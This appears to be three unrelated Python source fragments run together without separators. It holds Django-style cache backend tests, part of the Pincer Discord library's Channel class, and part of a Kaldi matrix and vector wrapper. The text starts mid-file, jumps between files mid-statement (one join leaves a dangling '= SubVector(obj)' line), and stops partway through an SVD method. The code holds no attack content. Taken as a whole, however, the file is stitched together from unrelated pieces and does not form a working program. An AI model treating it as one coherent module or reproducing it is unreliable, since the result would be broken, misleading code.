# so it has its own test case.
def test_simple(self):
"Dummy cache backend ignores cache set calls"
cache.set("key", "value")
self.assertIsNone(cache.get("key"))
def test_add(self):
"Add doesn't do anything in dummy cache backend"
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertTrue(result)
self.assertIsNone(cache.get("addkey1"))
def test_non_existent(self):
"Non-existent keys aren't found in the dummy cache backend"
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
"get_many returns nothing for the dummy cache backend"
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertEqual(cache.get_many(['a', 'c', 'd']), {})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {})
def test_delete(self):
"Cache deletion is transparently ignored on the dummy cache backend"
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertIsNone(cache.get("key1"))
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_has_key(self):
"The has_key method doesn't ever return True for the dummy cache backend"
cache.set("hello1", "goodbye1")
self.assertFalse(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
def test_in(self):
"The in operator doesn't ever return True for the dummy cache backend"
cache.set("hello2", "goodbye2")
self.assertNotIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
"Dummy cache values can't be incremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.incr, 'answer')
self.assertRaises(ValueError, cache.incr, 'does_not_exist')
def test_decr(self):
"Dummy cache values can't be decremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.decr, 'answer')
self.assertRaises(ValueError, cache.decr, 'does_not_exist')
def test_data_types(self):
"All data types are ignored equally by the dummy cache"
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertIsNone(cache.get("stuff"))
def test_expiration(self):
"Expiration has no effect on the dummy cache"
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertIsNone(cache.get("expire2"))
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
"Unicode values are ignored by the dummy cache"
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
for (key, value) in stuff.items():
cache.set(key, value)
self.assertIsNone(cache.get(key))
def test_set_many(self):
"set_many does nothing for the dummy cache backend"
cache.set_many({'a': 1, 'b': 2})
cache.set_many({'a': 1, 'b': 2}, timeout=2, version='1')
def test_delete_many(self):
"delete_many does nothing for the dummy cache backend"
cache.delete_many(['a', 'b'])
def test_clear(self):
"clear does nothing for the dummy cache backend"
cache.clear()
def test_incr_version(self):
"Dummy cache versions can't be incremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.incr_version, 'answer')
self.assertRaises(ValueError, cache.incr_version, 'does_not_exist')
def test_decr_version(self):
"Dummy cache versions can't be decremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.decr_version, 'answer')
self.assertRaises(ValueError, cache.decr_version, 'does_not_exist')
def test_get_or_set(self):
self.assertEqual(cache.get_or_set('mykey', 'default'), 'default')
def test_get_or_set_callable(self):
def my_callable():
return 'default'
self.assertEqual(cache.get_or_set('mykey', my_callable), 'default')
def custom_key_func(key, key_prefix, version):
"A customized cache key function"
return 'CUSTOM-' + '-'.join([key_prefix, str(version), key])
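# For illustration: the hypothetical call custom_key_func('answer', 'prefix', 2)
# produces the cache key 'CUSTOM-prefix-2-answer'.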
_caches_setting_base = {
'default': {},
'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())},
'v2': {'VERSION': 2},
'custom_key': {'KEY_FUNCTION': custom_key_func},
'custom_key2': {'KEY_FUNCTION': 'cache.tests.custom_key_func'},
'cull': {'OPTIONS': {'MAX_ENTRIES': 30}},
'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}},
}
def caches_setting_for_tests(base=None, **params):
# `base` is used to pull in the memcached config from the original settings,
# `params` are test specific overrides and `_caches_settings_base` is the
# base config for the tests.
# This results in the following search order:
# params -> _caches_setting_base -> base
base = base or {}
setting = {k: base.copy() for k in _caches_setting_base.keys()}
for key, cache_params in setting.items():
cache_params.update(_caches_setting_base[key])
cache_params.update(params)
return setting
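# Illustrative sketch only: backend-specific test classes (defined further down
# in the full test suite) typically combine this helper with override_settings.
# The backend path below is an example value, not something configured in this
# excerpt.
#
#   @override_settings(CACHES=caches_setting_for_tests(
#       BACKEND='django.core.cache.backends.locmem.LocMemCache',
#   ))
#   class ExampleLocMemCacheTests(BaseCacheTests, TestCase):
#       pass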
class BaseCacheTests(object):
# A common set of tests to apply to all cache backends
def setUp(self):
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_simple(self):
# Simple cache set/get works
cache.set("key", "value")
self.assertEqual(cache.get("key"), "value")
def test_add(self):
# A key can be added to a cache
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertFalse(result)
self.assertEqual(cache.get("addkey1"), "value")
def test_prefix(self):
# Test for same cache key conflicts between shared backend
cache.set('somekey', 'value')
# should not be set in the prefixed cache
self.assertFalse(caches['prefix'].has_key('somekey'))
caches['prefix'].set('somekey', 'value2')
self.assertEqual(cache.get('somekey'), 'value')
self.assertEqual(caches['prefix'].get('somekey'), 'value2')
def test_non_existent(self):
# Non-existent cache keys return as None/default
# get with non-existent keys
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
# Multiple cache keys can be returned using get_many
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertDictEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'})
self.assertDictEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'})
def test_delete(self):
# Cache keys can be deleted
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertEqual(cache.get("key1"), "spam")
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertEqual(cache.get("key2"), "eggs")
def test_has_key(self):
# The cache can be inspected for cache keys
cache.set("hello1", "goodbye1")
self.assertTrue(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
cache.set("no_expiry", "here", None)
self.assertTrue(cache.has_key("no_expiry"))
def test_in(self):
# The in operator can be used to inspect cache contents
cache.set("hello2", "goodbye2")
self.assertIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
# Cache values can be incremented
cache.set('answer', 41)
self.assertEqual(cache.incr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.incr('answer', 10), 52)
self.assertEqual(cache.get('answer'), 52)
self.assertEqual(cache.incr('answer', -10), 42)
self.assertRaises(ValueError, cache.incr, 'does_not_exist')
def test_decr(self):
# Cache values can be decremented
cache.set('answer', 43)
self.assertEqual(cache.decr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.decr('answer', 10), 32)
self.assertEqual(cache.get('answer'), 32)
self.assertEqual(cache.decr('answer', -10), 42)
self.assertRaises(ValueError, cache.decr, 'does_not_exist')
def test_close(self):
self.assertTrue(hasattr(cache, 'close'))
cache.close()
def test_data_types(self):
# Many different data types can be cached
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertEqual(cache.get("stuff"), stuff)
def test_cache_read_for_model_instance(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
my_poll = Poll.objects.create(question="Well?")
self.assertEqual(Poll.objects.count(), 1)
pub_date = my_poll.pub_date
cache.set('question', my_poll)
cached_poll = cache.get('question')
self.assertEqual(cached_poll.pub_date, pub_date)
# We only want the default expensive calculation run once
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_write_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache write
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
self.assertEqual(expensive_calculation.num_runs, 1)
cache.set('deferred_queryset', defer_qs)
# cache set should not re-evaluate default functions
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_read_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
cache.set('deferred_queryset', defer_qs)
self.assertEqual(expensive_calculation.num_runs, 1)
runs_before_cache_read = expensive_calculation.num_runs
cache.get('deferred_queryset')
# We only want the default expensive calculation run on creation and set
self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read)
def test_expiration(self):
# Cache values can be set to expire
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertEqual(cache.get("expire2"), "newvalue")
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
# Unicode values can be cached
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
# Test `set`
for (key, value) in stuff.items():
cache.set(key, value)
self.assertEqual(cache.get(key), value)
# Test `add`
for (key, value) in stuff.items():
cache.delete(key)
cache.add(key, value)
self.assertEqual(cache.get(key), value)
# Test `set_many`
for (key, value) in stuff.items():
cache.delete(key)
cache.set_many(stuff)
for (key, value) in stuff.items():
self.assertEqual(cache.get(key), value)
def test_binary_string(self):
# Binary strings should be cacheable
from zlib import compress, decompress
value = 'value_to_be_compressed'
compressed_value = compress(value.encode())
# Test set
cache.set('binary1', compressed_value)
compressed_result = cache.get('binary1')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test add
cache.add('binary1-add', compressed_value)
compressed_result = cache.get('binary1-add')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test set_many
cache.set_many({'binary1-set_many': compressed_value})
compressed_result = cache.get('binary1-set_many')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
def test_set_many(self):
# Multiple keys can be set using set_many
cache.set_many({"key1": "spam", "key2": "eggs"})
self.assertEqual(cache.get("key1"), "spam")
self.assertEqual(cache.get("key2"), "eggs")
def test_set_many_expiration(self):
# set_many takes a second ``timeout`` parameter
cache.set_many({"key1": "spam", "key2": "eggs"}, 1)
time.sleep(2)
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_delete_many(self):
# Multiple keys can be deleted using delete_many
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.set("key3", "ham")
cache.delete_many(["key1", "key2"])
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
self.assertEqual(cache.get("key3"), "ham")
def test_clear(self):
        # The cache can be emptied using clear
        cache.set("key1", "spam")
        cache.clear()
        self.assertIsNone(cache.get("key1"))
# Copyright Pincer 2021-Present
# Full MIT License can be found in `LICENSE` at the project root.
from __future__ import annotations
from asyncio import sleep, ensure_future
from dataclasses import dataclass
from enum import IntEnum
from typing import AsyncIterator, overload, TYPE_CHECKING
from .invite import Invite, InviteTargetType
from ..message.user_message import UserMessage
from ..._config import GatewayConfig
from ...utils.api_data import APIDataGen
from ...utils.api_object import APIObject, GuildProperty
from ...utils.convert_message import convert_message
from ...utils.types import MISSING
if TYPE_CHECKING:
from typing import Dict, List, Optional, Union
from .member import GuildMember
from .overwrite import Overwrite
from .thread import ThreadMetadata
from .webhook import Webhook
from ..message.message import Message
from ..message.embed import Embed
from ..user.user import User
from ...client import Client
from ...objects import ThreadMember
from ...utils.timestamp import Timestamp
from ...utils.types import APINullable
from ...utils.snowflake import Snowflake
class ChannelType(IntEnum):
"""Represents a channel its type.
Attributes
----------
GUILD_TEXT:
A text channel.
DM:
A DM channel.
GUILD_VOICE:
A voice channel.
GROUP_DM:
A group DM channel.
GUILD_CATEGORY:
A category channel.
GUILD_NEWS:
A news channel.
GUILD_STORE:
A store channel.
GUILD_NEWS_THREAD:
A news thread.
GUILD_PUBLIC_THREAD:
A public thread.
GUILD_PRIVATE_THREAD:
A private thread.
GUILD_STAGE_VOICE:
A stage channel.
"""
GUILD_TEXT = 0
DM = 1
GUILD_VOICE = 2
GROUP_DM = 3
GUILD_CATEGORY = 4
GUILD_NEWS = 5
GUILD_STORE = 6
if GatewayConfig.version >= 9:
GUILD_NEWS_THREAD = 10
GUILD_PUBLIC_THREAD = 11
GUILD_PRIVATE_THREAD = 12
GUILD_STAGE_VOICE = 13
@dataclass(repr=False)
class Channel(APIObject, GuildProperty): # noqa E501
"""Represents a Discord Channel Mention object
Attributes
----------
id: :class:`~pincer.utils.snowflake.Snowflake`
The id of this channel
type: :class:`~pincer.objects.guild.channel.ChannelType`
The type of channel
application_id: APINullable[:class:`~pincer.utils.snowflake.Snowflake`]
Application id of the group DM creator if it is bot-created
bitrate: APINullable[:class:`int`]
The bitrate (in bits) of the voice channel
default_auto_archive_duration: APINullable[:class:`int`]
Default duration for newly created threads, in minutes, to
automatically archive the thread after recent activity, can be set to:
60, 1440, 4320, 10080
guild_id: APINullable[:class:`~pincer.utils.snowflake.Snowflake`]
The id of the guild (maybe missing for some channel objects received
over gateway guild dispatches)
icon: APINullable[Optional[:class:`str`]]
Icon hash
last_message_id: APINullable[Optional[:class:`~pincer.utils.snowflake.Snowflake`]]
The id of the last message sent in this channel (may not point to an
existing or valid message)
last_pin_timestamp: APINullable[Optional[:class:`~pincer.utils.timestamp.Timestamp`]]
When the last pinned message was pinned. This may be null in events
such as GUILD_CREATE when a message is not pinned.
member: APINullable[:class:`~pincer.objects.guild.member.GuildMember`]
Thread member object for the current user, if they have joined the
thread, only included on certain API endpoints
member_count: APINullable[:class:`int`]
An approximate count of users in a thread, stops counting at 50
message_count: :class:`int`
An approximate count of messages in a thread, stops counting at 50
name: APINullable[:class:`str`]
The name of the channel (1-100 characters)
nsfw: APINullable[:class:`bool`]
Whether the channel is nsfw
owner_id: APINullable[:class:`~pincer.utils.snowflake.Snowflake`]
Id of the creator of the group DM or thread
parent_id: APINullable[Optional[:class:`~pincer.utils.snowflake.Snowflake`]]
For guild channels: id of the parent category for a channel (each
parent category can contain up to 50 channels), for threads: id of the
text channel this thread was created
permissions: APINullable[:class:`str`]
Computed permissions for the invoking user in the channel, including
overwrites, only included when part of the resolved data received on a
slash command interaction
permission_overwrites: APINullable[List[:class:`~pincer.objects.guild.overwrite.Overwrite`]]
Explicit permission overwrites for members and roles
position: APINullable[:class:`int`]
Sorting position of the channel
rate_limit_per_user: APINullable[:class:`int`]
Amount of seconds a user has to wait before sending another message
(0-21600); bots, as well as users with the permission manage_messages
or manage_channel, are unaffected
recipients: APINullable[List[:class:`~pincer.objects.user.user.User`]]
The recipients of the DM
rtc_region: APINullable[Optional[:class:`str`]]
Voice region id for the voice channel, automatic when set to null
thread_metadata: APINullable[:class:`~pincer.objects.guild.thread.ThreadMetadata`]
Thread-specific fields not needed by other channels
topic: APINullable[Optional[:class:`str`]]
The channel topic (0-1024 characters)
user_limit: APINullable[:class:`int`]
The user limit of the voice channel
video_quality_mode: APINullable[:class:`int`]
The camera video quality mode of the voice channel, 1 when not present
"""
# noqa: E501
id: Snowflake
type: ChannelType
application_id: APINullable[Snowflake] = MISSING
bitrate: APINullable[int] = MISSING
default_auto_archive_duration: APINullable[int] = MISSING
guild_id: APINullable[Snowflake] = MISSING
icon: APINullable[Optional[str]] = MISSING
last_message_id: APINullable[Optional[Snowflake]] = MISSING
last_pin_timestamp: APINullable[Optional[Timestamp]] = MISSING
member: APINullable[GuildMember] = MISSING
member_count: APINullable[int] = MISSING
message_count: APINullable[int] = MISSING
name: APINullable[str] = MISSING
nsfw: APINullable[bool] = MISSING
owner_id: APINullable[Snowflake] = MISSING
parent_id: APINullable[Optional[Snowflake]] = MISSING
permissions: APINullable[str] = MISSING
permission_overwrites: APINullable[List[Overwrite]] = MISSING
# Position is always 0 when not sent
position: APINullable[int] = 0
rate_limit_per_user: APINullable[int] = MISSING
recipients: APINullable[List[User]] = MISSING
rtc_region: APINullable[Optional[str]] = MISSING
thread_metadata: APINullable[ThreadMetadata] = MISSING
topic: APINullable[Optional[str]] = MISSING
user_limit: APINullable[int] = MISSING
video_quality_mode: APINullable[int] = MISSING
@property
def mention(self):
return f"<#{self.id}>"
@classmethod
async def from_id(cls, client: Client, channel_id: int) -> Channel:
"""|coro|
Creates a channel object. You should use the ``get_channel`` method
from :class:`~pincer.client.Client` most of the time. The
``get_dm_channel`` method from :class:`~pincer.objects.user.user.User`
should be used if you need to create a dm_channel. Using the ``send()``
method from :class:`~pincer.objects.user.user.User` is preferred.
Parameters
----------
client : :class:`~pincer.client.Client`
Client object to use the HTTP class of.
channel_id : :class:`int`
ID of the channel you want.
Returns
-------
:class:`~pincer.objects.guild.channel.Channel`
The channel object.
"""
data = (await client.http.get(f"channels/{channel_id}")) or {}
data.update({"type": ChannelType(data.pop("type"))})
channel_cls = _channel_type_map.get(data["type"], Channel)
return channel_cls.from_dict(data)
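    # Usage sketch (assumption, not library documentation): given an initialized
    # ``Client`` named ``client`` and a made-up channel id,
    #
    #   channel = await Channel.from_id(client, 1234567890)
    #
    # the result is an instance of the subclass matching the channel type, as
    # resolved through ``_channel_type_map``.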
@overload
async def edit(
self,
*,
name: str = None,
type: ChannelType = None,
position: int = None,
topic: str = None,
nsfw: bool = None,
rate_limit_per_user: int = None,
bitrate: int = None,
user_limit: int = None,
permissions_overwrites: List[Overwrite] = None,
parent_id: Snowflake = None,
rtc_region: str = None,
video_quality_mod: int = None,
default_auto_archive_duration: int = None,
) -> Channel:
...
async def edit(self, reason: Optional[str] = None, **kwargs):
"""|coro|
Edit a channel with the given keyword arguments.
Parameters
----------
        reason: Optional[:class:`str`]
The reason of the channel delete.
\\*\\*kwargs :
The keyword arguments to edit the channel with.
Returns
-------
:class:`~pincer.objects.guild.channel.Channel`
The updated channel object.
"""
headers = {}
if reason is not None:
headers["X-Audit-Log-Reason"] = str(reason)
data = await self._http.patch(
f"channels/{self.id}", kwargs, headers=headers
)
data.update({"type": ChannelType(data.pop("type"))})
channel_cls = _channel_type_map.get(data["type"], Channel)
return channel_cls.from_dict(data)
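    # Illustrative only (argument values are made up): renaming a channel and
    # marking it NSFW, with an audit-log reason.
    #
    #   channel = await channel.edit(reason="cleanup", name="general-2", nsfw=True)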
async def edit_permissions(
self,
overwrite: Overwrite,
allow: str,
deny: str,
type: int,
reason: Optional[str] = None,
):
"""|coro|
Edit the channel permission overwrites for a user or role in a channel.
Only usable for guild channels. Requires the ``MANAGE_ROLES`` permission.
Only permissions your bot has in the guild or channel can be
allowed/denied (unless your bot has a ``MANAGE_ROLES`` overwrite in the channel).
Parameters
----------
overwrite: :class:`~pincer.objects.guild.overwrite.Overwrite`
The overwrite object.
allow: :class:`str`
The bitwise value of all allowed permissions.
deny: :class:`str`
The bitwise value of all denied permissions.
type: :class:`int`
0 for a role or 1 for a member.
reason: Optional[:class:`str`]
The reason of the channel delete.
"""
await self._http.put(
f"channels/{self.id}/permissions/{overwrite.id}",
headers={"X-Audit-Log-Reason": reason},
data={"allow": allow, "deny": deny, "type": type},
)
async def delete_permission(
self, overwrite: Overwrite, reason: Optional[str] = None
):
"""|coro|
Delete a channel permission overwrite for a user or role in a channel.
Only usable for guild channels. Requires the ``MANAGE_ROLES`` permission.
Parameters
----------
overwrite: :class:`~pincer.objects.guild.overwrite.Overwrite`
The overwrite object.
reason: Optional[:class:`str`]
The reason of the channel delete.
"""
await self._http.delete(
f"channels/{self.id}/permissions/{overwrite.id}",
headers={"X-Audit-Log-Reason": reason},
)
async def follow_news_channel(
self, webhook_channel_id: Snowflake
) -> NewsChannel:
"""|coro|
Follow a News Channel to send messages to a target channel.
Requires the ``MANAGE_WEBHOOKS`` permission in the target channel.
Returns a followed channel object.
Parameters
----------
webhook_channel_id: :class:`Snowflake`
The ID of the channel to follow.
Returns
-------
:class:`~pincer.objects.guild.channel.NewsChannel`
The followed channel object.
"""
return NewsChannel.from_dict(
            await self._http.post(
f"channels/{self.id}/followers",
data={"webhook_channel_id": webhook_channel_id},
)
)
async def trigger_typing_indicator(self):
"""|coro|
Post a typing indicator for the specified channel.
Generally bots should **not** implement this route. However, if a bot is
responding to a command and expects the computation to take a few
seconds, this endpoint may be called to let the user know that the bot
is processing their message.
"""
await self._http.post(f"channels/{self.id}/typing")
def get_pinned_messages(self) -> APIDataGen[UserMessage]:
"""|coro|
Fetches all pinned messages in the channel. Returns an iterator of
pinned messages.
Returns
-------
:class:`AsyncIterator[:class:`~pincer.objects.guild.message.UserMessage`]`
An iterator of pinned messages.
"""
return APIDataGen(
UserMessage,
self._http.get(f"channels/{self.id}/pins")
)
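    # Consumption sketch (variable names are assumptions): APIDataGen yields
    # UserMessage objects and is iterated asynchronously.
    #
    #   async for pinned in channel.get_pinned_messages():
    #       ...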
async def pin_message(
self, message: UserMessage, reason: Optional[str] = None
):
"""|coro|
Pin a message in a channel. Requires the ``MANAGE_MESSAGES`` permission.
= SubVector(obj)
self.resize_(obj.dim, _matrix_common.MatrixResizeType.UNDEFINED)
self.copy_(obj)
def __delitem__(self, index):
"""Removes an element from the vector."""
if not (0 <= index < self.dim):
raise IndexError("index={} should be in the range [0,{})."
.format(index, self.dim))
self._remove_element_(index)
class SubVector(_VectorBase, _matrix_ext.SubVector):
"""Single precision vector view."""
def __init__(self, obj, start=0, length=None):
"""Creates a new vector view from a vector like object.
If possible the new vector view will share its data with the `obj`,
i.e. no copy will be made. A copy will only be made if `obj.__array__`
returns a copy, if `obj` is a sequence, or if a copy is needed to
satisfy any of the other requirements (data type, order, etc.).
Regardless of whether a copy is made or not, the new vector view will
not own the memory buffer backing it, i.e. it will not support vector
operations that reallocate memory.
Args:
obj (vector_like): A vector, a 1-D numpy array, any object exposing
a 1-D array interface, an object whose __array__ method returns
a 1-D numpy array, or any sequence that can be interpreted as a
vector.
start (int): The index of the view start. Defaults to 0.
length (int): The length of the view. If None, it is set to
len(obj) - start. Defaults to None.
"""
if not isinstance(obj, _kaldi_vector.VectorBase):
obj = numpy.array(obj, dtype=numpy.float32, copy=False, order='C')
if obj.ndim != 1:
raise ValueError("obj should be a 1-D vector like object.")
obj_len = len(obj)
if not (0 <= start <= obj_len):
raise IndexError("start={0} should be in the range [0,{1}] "
"when len(obj)={1}.".format(start, obj_len))
max_len = obj_len - start
if length is None:
length = max_len
if not (0 <= length <= max_len):
raise IndexError("length={} should be in the range [0,{}] when "
"start={} and len(obj)={}."
.format(length, max_len, start, obj_len))
super(SubVector, self).__init__(obj, start, length)
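# Hedged example (not part of the wrapper itself): a SubVector is a view, so it
# shares memory with the object it wraps and cannot be resized.
#
#   import numpy as np
#   arr = np.arange(5, dtype=np.float32)
#   sub = SubVector(arr, start=1, length=3)   # view over arr[1:4]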
class _MatrixBase(object):
"""Base class defining the additional API for single precision matrices.
No constructor.
"""
def copy_(self, src, trans=_matrix_common.MatrixTransposeType.NO_TRANS):
"""Copies the elements from another matrix.
Args:
src(Matrix or SpMatrix or TpMatrix or DoubleMatrix or DoubleSpMatrix or DoubleTpMatrix or CompressedMatrix):
The input matrix.
trans (MatrixTransposeType): Whether to use **src** or its transpose.
Defaults to ``MatrixTransposeType.NO_TRANS``. Not active if
input is a compressed matrix.
Raises:
ValueError: In case of size mismatch.
"""
if self.size() != src.size():
raise ValueError("Cannot copy matrix with dimensions {s[0]}x{s[1]} "
"into matrix with dimensions {d[0]}x{d[1]}"
.format(s=src.size(), d=self.size()))
if isinstance(src, _kaldi_matrix.MatrixBase):
self._copy_from_mat_(src, trans)
elif isinstance(src, _sp_matrix.SpMatrix):
_kaldi_matrix_ext._copy_from_sp(self, src)
elif isinstance(src, _tp_matrix.TpMatrix):
_kaldi_matrix_ext._copy_from_tp(self, src, trans)
elif isinstance(src, _kaldi_matrix.DoubleMatrixBase):
_kaldi_matrix_ext._copy_from_double_mat(self, src, trans)
        elif isinstance(src, _sp_matrix.DoubleSpMatrix):
            _kaldi_matrix_ext._copy_from_double_sp(self, src)
        elif isinstance(src, _tp_matrix.DoubleTpMatrix):
            _kaldi_matrix_ext._copy_from_double_tp(self, src, trans)
elif isinstance(src, _compressed_matrix.CompressedMatrix):
_kaldi_matrix_ext._copy_from_cmat(self, src)
else:
raise TypeError("input matrix type is not supported.")
return self
def clone(self):
"""Clones the matrix.
The clone allocates new memory for its contents and supports matrix
operations that reallocate memory, i.e. it is not a view.
Returns:
Matrix: A copy of the matrix.
"""
return Matrix(self)
def size(self):
"""Returns the size of the matrix.
Returns:
A tuple (num_rows, num_cols) of integers.
"""
return self.num_rows, self.num_cols
@property
def shape(self):
"""Two element tuple representing the size of the matrix."""
return self.size()
def approx_equal(self, other, tol=0.01):
"""Checks if matrices are approximately equal.
Args:
other (Matrix): The matrix to compare against.
tol (float): The tolerance for the equality check.
Defaults to ``0.01``.
Returns:
True if `self.size() == other.size()` and
`||self-other|| <= tol*||self||`. False otherwise.
"""
if not isinstance(other, _kaldi_matrix.MatrixBase):
return False
if self.num_rows != other.num_rows or self.num_cols != other.num_cols:
return False
return self._approx_equal(other, tol)
def __eq__(self, other):
return self.approx_equal(other, 1e-16)
def numpy(self):
"""Converts the matrix to a 2-D NumPy array.
The NumPy array is a view into the matrix, i.e. no data is copied.
Returns:
numpy.ndarray: A NumPy array sharing data with this matrix.
"""
return _matrix_ext.matrix_to_numpy(self)
@property
def data(self):
"""Matrix data as a memoryview."""
return self.numpy().data
def row_data(self, index):
"""Returns row data as a memoryview."""
return self[index].data
def row(self, index):
"""Returns the given row as a new vector view.
Args:
index (int): The row index.
Returns:
SubVector: A vector view representing the given row.
"""
return self[index]
def range(self, row_start, num_rows, col_start, num_cols):
"""Returns the given range of elements as a new matrix view.
Args:
row_start (int): The start row index.
num_rows (int): The number of rows.
col_start (int): The start column index.
num_cols (int): The number of columns.
Returns:
SubMatrix: A matrix view representing the given range.
"""
return SubMatrix(self, row_start, num_rows, col_start, num_cols)
def row_range(self, row_start, num_rows):
"""Returns the given range of rows as a new matrix view.
Args:
row_start (int): The start row index.
num_rows (int): The number of rows.
Returns:
SubMatrix: A matrix view representing the given row range.
"""
return SubMatrix(self, row_start, num_rows, 0, self.num_cols)
def col_range(self, col_start, num_cols):
"""Returns the given range of columns as a new matrix view.
Args:
col_start (int): The start column index.
num_cols (int): The number of columns.
Returns:
SubMatrix: A matrix view representing the given column range.
"""
return SubMatrix(self, 0, self.num_rows, col_start, num_cols)
def eig(self):
"""Computes eigendecomposition.
Factorizes a square matrix into :math:`P\\ D\\ P^{-1}`.
The relationship of :math:`D` to the eigenvalues is slightly
complicated, due to the need for :math:`P` to be real. In the symmetric
case, :math:`D` is diagonal and real, but in the non-symmetric case
there may be complex-conjugate pairs of eigenvalues. In this case, for
the equation :math:`y = P\\ D\\ P^{-1}` to hold, :math:`D` must actually
be block diagonal, with 2x2 blocks corresponding to any such pairs. If a
pair is :math:`\\lambda +- i\\mu`, :math:`D` will have a corresponding
2x2 block :math:`[\\lambda, \\mu; -\\mu, \\lambda]`. Note that if the
matrix is not invertible, :math:`P` may not be invertible so in this
case instead of the equation :math:`y = P\\ D\\ P^{-1}` holding, we have
:math:`y\\ P = P\\ D`.
Returns:
3-element tuple containing
- **P** (:class:`Matrix`): The eigenvector matrix, where ith column
corresponds to the ith eigenvector.
- **r** (:class:`Vector`): The vector with real components of the
eigenvalues.
- **i** (:class:`Vector`): The vector with imaginary components of
the eigenvalues.
Raises:
ValueError: If the matrix is not square.
"""
m, n = self.size()
if m != n:
raise ValueError("eig method cannot be called on a non-square "
"matrix.")
P = Matrix(n, n)
r, i = Vector(n), Vector(n)
self._eig(P, r, i)
return P, r, i
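    # Usage sketch (names are assumptions): for a square matrix ``m``,
    #
    #   P, r, i = m.eig()
    #
    # ``r`` and ``i`` hold the real and imaginary parts of the eigenvalues and
    # ``P`` holds the eigenvectors, as described in the docstring above.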
def svd(self, destructive=False):
"""Computes singular-value decomposition.
Factorizes a matrix into :math:`U\\ diag(s)\\ V^T`.
For non-square matrices, requires `self.num_rows >= self.num_cols`.
Args:
destructive (bool): Whether to use the destructive operation which
avoids a copy but mutates self. Defaults to ``False``.
Returns:
3-element tuple containing
- **s** (:class:`Vector`): The vector of singular values.
- **U** (:class:`Matrix`): The left orthonormal matrix.
- **Vt** (:class:`Matrix`): The right orthonormal matrix.
Raises:
ValueError: If `self.num_rows < self.num_cols`.
Note:
**Vt** in the output is already transposed.
The singular values in **s** are not sorted.
See Also:
:meth:`singular_values`
:meth:`sort_svd`
"""
m, n = self.size()
if m < n:
raise ValueError("svd for non-square matrices requires "
"self.num_rows >= self.num_cols.")
U, Vt = Matrix(m, n), Matrix(n, n)
